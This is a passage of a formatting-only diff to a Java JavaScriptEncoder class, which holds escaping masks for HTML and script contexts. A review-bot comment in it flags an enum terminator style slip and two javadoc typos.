/** * Encodes for use in either HTML script attributes or blocks. * Essentially this is both special escapes from HTML_ATTRIBUTE and * HTML_CONTENT combined. */ - HTML, - ; + HTML,; } /** 
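Review bot: The enum terminator on the new side reads `HTML,;`, which fuses the constant list's trailing comma with the semicolon and is a point of style worth fixing while the file is being reformatted; `HTML;` (or the original `HTML,` with `;` on its own line) reads as intended. Dropping the explicit `static` is a no-op, since a nested enum is implicitly static, so the hunk stays behaviour-preserving. Two documentation slips in the unchanged ATTRIBUTE and BLOCK javadoc inside this hunk could be picked up at the same time: the single-quote entity is written as `\&39;` where the numeric reference for `'` is `&#39;`, and "permaturely" should read "prematurely".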
@@ -86,21 +82,20 @@ class JavaScriptEncoder extends Encoder { */ private final Mode _mode; /** - * True if quotation characters should be hex encoded. Hex encoding - * quotes allows JavaScript to be included in XML attributes without - * additional XML-based encoding. + * True if quotation characters should be hex encoded. Hex encoding quotes + * allows JavaScript to be included in XML attributes without additional + * XML-based encoding. */ private final boolean _hexEncodeQuotes; /** * An array of 4 32-bit integers used as bitmasks to check if a character - * needs encoding or not. If the bit is set, the character is valid and - * does not need encoding. + * needs encoding or not. If the bit is set, the character is valid and does + * not need encoding. */ private final int[] _validMasks; /** - * True if the output should only include ASCII characters. Valid - * non-ASCII characters that would normally not be encoded, will be - * encoded. + * True if the output should only include ASCII characters. Valid non-ASCII + * characters that would normally not be encoded, will be encoded. */ private final boolean _asciiOnly; @@ -108,9 +103,8 @@ class JavaScriptEncoder extends Encoder { * Constructs a new JavaScriptEncoder for the specified contextual mode. * * @param mode the mode of operation - * @param asciiOnly true if only ASCII characters should be included - * in the output (all code-points outside the ASCII range will be - * encoded). + * @param asciiOnly true if only ASCII characters should be included in the + * output (all code-points outside the ASCII range will be encoded). */ JavaScriptEncoder(Mode mode, boolean asciiOnly) { // TODO: after some testing it appears that an array of int masks 
@@ -125,12 +119,11 @@ class JavaScriptEncoder extends Encoder { // the Java spec (x << y) where x and y are integers, is evaluated // as (x << (y & 31)). Or put another way, only the lower 5 bits // of the shift amount are considered. - _validMasks = new int[] { + _validMasks = new int[]{ 0, -1 & ~((1 << '\'') | (1 << '\"')), -1 & ~((1 << '\\')), - asciiOnly ? ~(1 << Unicode.DEL) : -1, - }; + asciiOnly ? ~(1 << Unicode.DEL) : -1,}; if (mode == Mode.BLOCK || mode == Mode.HTML) { // in